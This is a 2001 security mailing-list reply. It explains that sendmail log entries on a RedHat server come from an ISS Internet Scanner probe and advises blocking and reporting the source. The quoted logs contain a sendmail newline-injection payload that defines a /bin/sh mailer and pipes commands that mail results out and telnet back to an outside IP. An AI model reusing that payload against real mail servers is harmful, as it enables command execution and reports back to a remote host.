[cobalt-security] Re: Maybe OT: maillog reports attack; other lists?

[Ralph Forsythe <rforsythe@xxxxxxxxxxxxx>]

Hi Eddie,

This is probably a scan from someone using ISS Internet Scanner against 
your server.  Given that it's a fairly expensive program I doubt it's a 
script kiddy (unless there are warez of it floating around somewhere), but 
the source of the scans is fairly obvious in your logs.  Basically it's 
scanning your server for sendmail vulnerabilities, and emailing any it 
finds back to jimmy@xxxxxxxxxxxxxxxxxx  Given that it's Internet Scanner, I 
recommend you check your other logs as well since it scans for a whole mess 
of stuff.  Note that it's also attempting to telnet back to this guy's box 
(the 'telnet 203.87.15.193 5701' part), though for what intention I'm not 
sure.  That IP resolves to: ara-as1-p193.netconnect.net.au.  Could be 
dialup, could be DSL, I dunno.

Unless you want traffic from this network for some reason, you may as well 
just block all inbound and outbound connections to this guy's 
system/network (netconnect.net.au) to prevent anymore scans or sending of 
information to him.  You may also want to report the scans to his ISP, 
since his email address is in plain view.

Take care,
Ralph Forsythe
rforsythe@xxxxxxxxxxxxx

At 12:03 PM 12/23/2001 -0800, Eddie Bishop wrote:
> From: "Edward Bishop" <eddie@xxxxxxxxxxxxxxxx>
> Date: Sat, 22 Dec 2001 23:25:51 -0000
> Subject: [cobalt-security] Maybe OT: maillog reports attack; other lists?
>
> I've got four entries in my maillog which I've never seen before and =
> which
> look terrifying. This is on my non-Cobalt server (RedHat) so I don't =
> know if
> it's of relevance to this list. If not, apologies - but I'd be grateful =
> for
> suggestions as to good lists to try, hopefully with people as helpful as =
> on
> this one.
>
> Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from
> ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog,
> P=3D/bin/sh, F=3DlsDFMeu, A=3Dsh -c $u^M Mlocal, P=3D/bin/sh, =
> F=3DlsDFMeu, A=3Dsh -c
> $u^M R<"|/... Vulnerable | mail jimmy@xxxxxxxxxxxxxxxxx">^M R<"|( sleep =
> 2 ;
> echo quit ) |telnet 203.87.15.193 5701"
>
> Dec 22 15:16:56 ns sendmail[9836]: NOQUEUE: POSSIBLE ATTACK from
> ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog,
> P=3D/bin/sh, F=3DlsDFMeu, A=3Dsh -c $u^M Mlocal, P=3D/bin/sh, =
> F=3DlsDFMeu, A=3Dsh -c
> $u^M R<"|/... Vulnerable | mail jimmy@xxxxxxxxxxxxxxxxx">^M R<"|( sleep =
> 2 ;
> echo quit ) |telnet 203.87.15.193 5701"
>
> Dec 22 15:16:57 ns sendmail[9837]: NOQUEUE:
> issCrootMprogP/bin/shFlsDFMeuAsh-c$uMlocalP/bin/shFlsDFMeuAsh-c$uR|/bin/e=
> cho
> SendmailIdentdBugVulnera: VRFY 1145130318@ISS
>
> Dec 22 15:16:57 ns sendmail[9838]: NOQUEUE:
> issCrootMprogP/bin/shFlsDFMeuAsh-c$uMlocalP/bin/shFlsDFMeuAsh-c$uR|/bin/e=
> cho
> SendmailIdentdBugVulnera: VRFY 1145130318@ISS
>
> --
> Eddie Bishop